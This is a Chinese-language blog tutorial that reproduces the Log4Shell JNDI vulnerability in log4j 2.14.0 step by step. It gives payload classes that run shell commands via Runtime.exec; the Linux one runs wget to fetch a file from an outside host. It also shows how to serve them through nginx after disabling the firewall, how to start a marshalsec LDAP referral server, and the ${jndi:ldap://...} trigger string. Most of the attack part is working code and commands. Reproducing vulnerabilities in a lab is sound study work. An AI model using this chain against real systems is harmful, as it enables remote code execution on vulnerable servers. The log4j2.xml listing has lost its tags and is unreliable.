log4j-2.14.0漏洞攻击复现


log4j-2.14.0漏洞攻击复现

? 刚知道log4j漏洞的时候,我就在自己负责的项目里简单测试了一下,没有测试出来也就没有再关注这个了。接下来几天的时间无论是朋友圈、聊天群、技术论坛都是在讨论这个话题的,成功引起了我的好奇,我就想复现一下这个漏洞。刚开始复现的时候为图省事我就创建了一个springboot项目,在springboot项目里无论我怎么测试都复现不了这个,然后我有怀疑是因为jdk的版本原因我使用的是jdk11,我更换了很多版本的jdk还是复现不了,直到我看到了一位大佬发布的帖子Spring Boot应对Log4j2注入漏洞官方指南中有这么一段话:

Spring Boot默认日志组件是logback,开发者通过日志门面Slf4j进行集成对接。Spring Boot 用户只有在将默认日志系统切换到 Log4J2 时才会受到此漏洞的影响。Spring Boot包含的log4j-to-slf4j和log4j-api、spring-boot-starter-logging不能独立利用。只有log4j-core在日志消息中使用和包含用户输入的应用程序容易受到攻击。

简单一句话在springboot默认配置中是不会触发这个漏洞的,而我为了图省事用的就是默认配置。接下来我创建了一个maven项目成功复现了这个漏洞。我把自己复现的过程记录下来,分享给大家。

环境准备:

软件 版本 描述 下载地址
CentOS 8.3.2011-x86_64-minimal liunx操作系统 链接: https://pan.baidu.com/s/1pG549BKWhbveM_Pvgj595g 提取码: iur3
Idk 1.8.0_312 Java 链接: https://pan.baidu.com/s/1jWUd1EjQnC5yybLiJlD9OA 提取码: knc7
marshalsec 0.0.3 java工具将数据转化为代码执行(这里是我编译好的) 链接: https://pan.baidu.com/s/1M-qLRpb8C3DWtVG9BNojdg 提取码: mc7c

攻击流程:

  1. 编写java攻击代码。
  2. 将编写的攻击代码编译成class文件,然后发布到文件服务器。这里我是用nginx做演示。
  3. marshalsec使用将编写的class用jndi发布出去。
  4. 本地测试触发。

开始实现:

第一步:编写攻击代码

import java.lang.Runtime;
import java.lang.Process;

/**
 * @author fuping
 */
public class Attack {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
			System.out.println("wget 下载图片");
            String[] commands = {"/bin/bash", "-c", "wget https://raw.githubusercontent.com/duzhaosongyue/img/main/1.png"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

liunx版本的攻击代码。

import java.io.IOException;

/**
 * @author fuping
 */
public class Attack {
    static {
        try {
            Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4j进来了\",64,\"来自熊猫头的消息\")(window.close)");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

windows版本的攻击代码。

第二步:发布攻击代码到文件服务器

  1. 在虚拟机centos系统中安装nginx。可以使用一下命令安装:yum -y install nginx

  2. 找到hmtl文件夹。可以使用一下命令搜索:find / -type d -name html

    这里我搜索到路径是 /usr/share/nginx/html。

  3. 上传编译好的class文件到搜索的html文件夹下。

  4. 启动nginx。命令如下:sudo nginx

  5. 使用虚拟主机ip+端口+文件名称尝试下载文件。

    这里我的下载地址为 http://172.16.102.19/Attack.class 。如果出现不能下载的情况请检查防火墙是否打开 命令如下:

    systemctl status firewalld                             #防火墙状态
    systemctl stop firewalld.service                       #关闭防火墙
    firewall systemctl disable firewalld.service           #禁止防火墙开机启动 
    
  6. 测试下载成功第二步完成进行下一步。

第三步:使用marshalsec发布jndi服务。

  1. 安装jdk1.8.0_312。

    1. 上传jdk-8u221-linux-x64.tar.gz到虚拟机。

    2. 创建/opt/java目录。创建命令:mkdir /opt/java

    3. 解压jdk到/opt/java目录下 。解压命令:tar -zxf jdk-8u221-linux-x64.tar.gz -C /opt/java

    4. 配置环境变量。命令:sudo vim /etc/profile. (如果没有安装vim 可以使用 yum -y install vim进行安装。)在profile文件最底部追加:

      export JAVA_HOME=/opt/java/jdk1.8.0_221
      export JRE_HOME=/opt/java/jdk1.8.0_221/jre 
      export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib:$CLASSPATH export PATH=$PATH:$JAVA_HOME/bin  
      
    5. 重新加载配置。执行命令 :source /etc/profile

    6. 测试jdk是否安装成功。执行命令: java -version

  2. 上传marshalsec到虚拟机。执行一下命令启动jndi服务:

    java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991

    172.16.102.19 指向文件服务器地址,Attack是编译后java攻击代码的类名称,触发jndi请求后会自动拼接请求 http://172.16.102.19/Attack.class 。

    上面这个命令不能后台运行,断开链接后也就终止了,后台运行使用:

    java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991 > log.txt >&1 &

第四步:本地触发

  1. 创建一个maven项目。

  2. 添加依赖 。

    在pom.xml中添加依赖:

    
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    
    
  3. 配置log4j。

    在src/main/resources目录下创建log4j2.xml 内容如下:

    注意window下路径是/,liunx下路径是\ 如果执行出现错误 请检查输出目录的/是否正确。

    <?xml version="1.0" encoding="UTF-8"?>
    
    
    
        
            
            logs
            logs\error
            logs\warn
    
            %d{yyyy-MM-dd HH:mm:ss.SSS} [%t-%L] %-5level %logger{36} - %msg%n
        
    
        
            
            
                
                
                
                
                
            
    
            
            
            
                
            
            
            
                
                
                
                
                    
                    
                    
                    
                    
                    
                
            
    
            
                
                
                
                    
                    
                
                
                
            
    
            
                
                
                
                    
                    
                    
                
            
    
        
    
        
        
            
            
            
    
            
            
            
            
            
            
            
    
    
            
            
                
                
                
                
            
    
        
    
    
    
  4. 编写测试代码。

    package com;
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    /**
     * @author fuping
     */
    public class Log4jTest {
        
        private static final Logger LOGGER = LogManager.getLogger(Log4jTest.class);
    
        public static void main(String[] args) {
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
            LOGGER.info("{}", "${jndi:ldap://172.16.102.19:9991/Attack}");
        }
    }
    

maven项目测试项目的源码可以在github下载